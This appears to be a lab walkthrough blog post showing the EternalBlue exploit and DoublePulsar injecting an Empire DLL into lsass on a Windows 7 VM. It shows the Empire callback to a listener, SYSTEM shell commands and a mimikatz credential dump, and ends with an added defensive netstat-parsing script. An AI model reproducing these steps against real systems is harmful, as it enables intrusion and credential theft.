Delivering a DLL with Doublepulsar

This time we use Doublepulsar to deliver a DLL created with Empire.

This exercise shows how WannaCry operates.

The cast consists of the following three machines.

  1. kali               10.0.2.15   Builds the DLL with Empire and establishes a session with the victim
  2. win7(x64) 10.0.2.5  Uses Fuzzbunch to exploit the vulnerability on the victim PC and deliver the DLL
  3. win7(x86) 10.0.2.4  The victim. Running modernIE11

DLL creation was covered in the previous post, so it is skipped here.

Exploit the vulnerability with Eternalblue, then deliver the DLL with Doublepulsar.

PS C:\shadowbroker-master\shadowbroker-master\windows> python .\fb.py

--[ Version 3.5.1
・
・
・
[?] Default Target IP Address [] : 10.0.2.4
[?] Default Callback IP Address [] : 127.0.0.1
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index     Project
-----     -------
0         test1
1         Create a New Project

[?] Project [0] :
[?] Set target log directory to 'c:\logs\test1\z10.0.2.4'? [Yes] :
・
・
・
fb > use Eternalblue
・
・
・
[?] Prompt For Variable Settings? [Yes] : Yes

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [10.0.2.4] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled
for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 1


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
・
・
・
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
・
・
・
fb Payload (Doublepulsar) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.0.2.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.0.2.4
TargetPort            445
DllPayload            c:\launcher.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] : No
[!] Skipping Prompt

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.0.2.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.0.2.4:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.0.2.4
TargetPort            445
DllPayload            c:\launcher.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] : Yes
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x73E99E05
    SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
    Target OS is: 7 x86
    Target SP is: 1
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

Done, just like that!

Next, wait on kali (Empire) for the session to be established. Once the session is up, verify that it works.

(Empire: stager/windows/dll) > [+] Initial agent G65ALUR1 from 10.0.2.4 now active (Slack)

(Empire: stager/windows/dll) > interact G65ALUR1
(Empire: G65ALUR1) > sysinfo
(Empire: G65ALUR1) > sysinfo: 0|http://10.0.2.15:8888|WORKGROUP|SYSTEM|IE11WIN7|10.0.2.4|Microsoft Windows 7 Enterprise |True|lsass|476|powershell|2

Listener:         http://10.0.2.15:8888
Internal IP:    10.0.2.4
Username:         WORKGROUP\SYSTEM
Hostname:       IE11WIN7
OS:               Microsoft Windows 7 Enterprise 
High Integrity:   1
Process Name:     lsass
Process ID:       476
Language:         powershell
Language Version: 2


(Empire: G65ALUR1) > shell ipconfig
(Empire: G65ALUR1) > 
Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.0.2.4
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.2.1

Tunnel adapter isatap.{A2692622-D935-45DD-BC6A-0FEA4F88524C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

..Command execution completed.

(Empire: G65ALUR1) > shellwhoami
[!] Command not recognized.
[*] Use 'help' or 'help agentcmds' to see available commands.
(Empire: G65ALUR1) > shell whoami
(Empire: G65ALUR1) > 
nt authority\system
..Command execution completed.

(Empire: G65ALUR1) > mimikatz
(Empire: G65ALUR1) > 
Job started: LEP823

Hostname: IE11Win7 / authority\system-authority\system

  .#####.   mimikatz 2.1 (x86) built on Dec 11 2016 18:01:05
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 97345 (00000000:00017c41)
Session           : Interactive from 1
User Name         : IEUser
Domain            : IE11WIN7
Logon Server      : IE11WIN7
Logon Time        : 12/23/2017 9:39:13 PM
SID               : S-1-5-21-3463664321-2923530833-3546627382-1000
  msv :	
   [00010000] CredentialKeys
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
   [00000003] Primary
   * Username : IEUser
   * Domain   : IE11WIN7
   * NTLM     : fc525c9683e8fe067095ba2ddc971889
   * SHA1     : e53d7244aa8727f5789b01d8959141960aad5d22
  tspkg :	
  wdigest :	
   * Username : IEUser
   * Domain   : IE11WIN7
   * Password : Passw0rd!

Checking the session with netstat

(Empire: agents) > rename G65ALUR1 IE11WIN7
(Empire: agents) > interact IE11WIN7
(Empire: IE11WIN7) > shell netstat -no
(Empire: IE11WIN7) > 
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.2.4:49637         168...:80        ESTABLISHED     2684
  TCP    10.0.2.4:49638         121...:443     CLOSE_WAIT      2684
  TCP    10.0.2.4:49639         23...:443       ESTABLISHED     2684
  TCP    10.0.2.4:49642         13...:80         TIME_WAIT       0
  TCP    10.0.2.4:49644         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49645         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49652         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49653         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49654         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49655         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49656         216...:443     ESTABLISHED     2684
  TCP    10.0.2.4:49657         216...:443     ESTABLISHED     2684
  TCP    10.0.2.4:49658         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49659         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49661         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49662         192...:443        ESTABLISHED     2684
  TCP    10.0.2.4:49663         192...:443        CLOSE_WAIT      2684
  TCP    10.0.2.4:49664         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49665         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49666         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49667         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49668         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49669         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49670         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49671         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49672         172...:443      ESTABLISHED     2684
  TCP    10.0.2.4:49685         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49686         192...:443         CLOSE_WAIT      2684
  TCP    10.0.2.4:49688         117...:443     ESTABLISHED     2744

It is not visible.
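The observation above is the useful defensive lesson of this exercise: a single netstat snapshot can miss an HTTP agent that only connects briefly to poll its listener, so a defender should ask who owns each socket rather than only what is connected right now. The Python below is an added example, not code from the post or from Empire; it parses netstat -no output and flags any socket owned by the lsass.exe PID (476 in the Empire sysinfo above) or any established session to an unexpected port. The sample rows are constructed, including a callback to 10.0.2.15:8888 that the post's own snapshot did not capture.

```python
import re
from collections import namedtuple

# One parsed row of "netstat -no"; state is "" for UDP rows, which have no State column.
Conn = namedtuple("Conn", "proto local remote state pid")

# Matches a data row of Windows "netstat -no"; banner and header lines do not start with TCP/UDP.
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")

def parse_netstat(text):
    """Parse the text of `netstat -no`, skipping the banner, column header and blank lines."""
    conns = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            conns.append(Conn(proto, local, remote, state or "", int(pid)))
    return conns

def remote_port(endpoint):
    """Port of 'host:port' or '[v6]:port'; -1 for the UDP wildcard '*:*'."""
    port = endpoint.rpartition(":")[2]
    return int(port) if port.isdigit() else -1

def flag_suspicious(conns, sensitive_pids, expected_ports=(80, 443)):
    """Return (reason, conn) pairs a defender would look at first: any TCP socket owned
    by a sensitive PID (lsass.exe should not talk to arbitrary hosts), and any
    established session to a port outside the expected set."""
    findings = []
    for c in conns:
        if c.proto != "TCP" or c.state == "LISTENING":
            continue
        if c.pid in sensitive_pids:
            findings.append(("sensitive-process socket", c))
        elif c.state == "ESTABLISHED" and remote_port(c.remote) not in expected_ports:
            findings.append(("unusual remote port", c))
    return findings

# Constructed sample modelled on the post's netstat output (assumption: PID 476 is lsass).
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.2.4:49637         192.0.2.10:80          ESTABLISHED     2684
  TCP    10.0.2.4:49642         192.0.2.11:80          TIME_WAIT       0
  TCP    10.0.2.4:49644         160.16.198.9:443       CLOSE_WAIT      2684
  TCP    10.0.2.4:49700         10.0.2.15:8888         ESTABLISHED     476
  TCP    10.0.2.4:49701         203.0.113.5:8080       ESTABLISHED     2684
  UDP    0.0.0.0:5355           *:*                                    1960
"""

if __name__ == "__main__":
    for reason, conn in flag_suspicious(parse_netstat(SAMPLE), sensitive_pids={476}):
        print(f"{reason}: pid {conn.pid} {conn.local} -> {conn.remote} ({conn.state})")
```

Because the agent polls rather than holding a connection open, run this against repeated snapshots (or against process-level network telemetry) rather than a single netstat run.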
